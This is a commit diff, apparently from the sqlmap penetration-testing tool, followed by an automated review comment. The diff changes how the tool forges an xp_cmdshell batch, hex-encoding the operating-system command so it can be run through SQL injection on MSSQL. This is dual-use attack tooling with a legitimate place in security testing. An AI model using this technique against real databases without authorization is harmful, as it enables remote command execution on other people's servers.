Hex-encoding the command is much shorter than unescaping with CHAR() for MSSQL; there is also no need for spaces between nested comments when forging the xp_cmdshell command to run

This commit is contained in:
Bernardo Damele 2012-07-01 23:41:10 +01:00
parent ff9e97a42c
commit 18be319d13


@ -14,6 +14,7 @@ from lib.core.common import popValue
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import wasLastRequestDelayed
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@ -148,9 +149,9 @@ class xp_cmdshell:
def xpCmdshellForgeCmd(self, cmd):
self.__randStr = randomStr(lowercase=True)
self.__cmd = unescaper.unescape("'%s'" % cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
self.__cmd = "0x%s" % hexencode(cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.__forgedCmd
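Review bot: xpCmdshellForgeCmd still has no docstring, and the new line `self.__cmd = "0x%s" % hexencode(cmd)` now rests on two unrecorded assumptions: the byte encoding hexencode produces is not visible in this hunk, and because the value lands in a `VARCHAR(8000)` variable the server silently truncates anything past 8000 characters, which was already the case before this change but is easier to miss now that the quoted form is gone. I would add a docstring along the lines of `"""Build the T-SQL batch that stores *cmd* in a hex-encoded VARCHAR variable and hands it to xp_cmdshell."""` and, on the hexencode line, `# hex literal needs no quoting; assumes hexencode's byte encoding matches the server collation and cmd fits 8000 chars -- confirm`. As a point of style, `self.__cmd` and `self.__forgedCmd` are only read inside this method, so plain locals would read more clearly than instance attributes that persist between calls; presumably nothing else depends on them, but that is not visible here. The enclosing class xp_cmdshell begins outside the hunk.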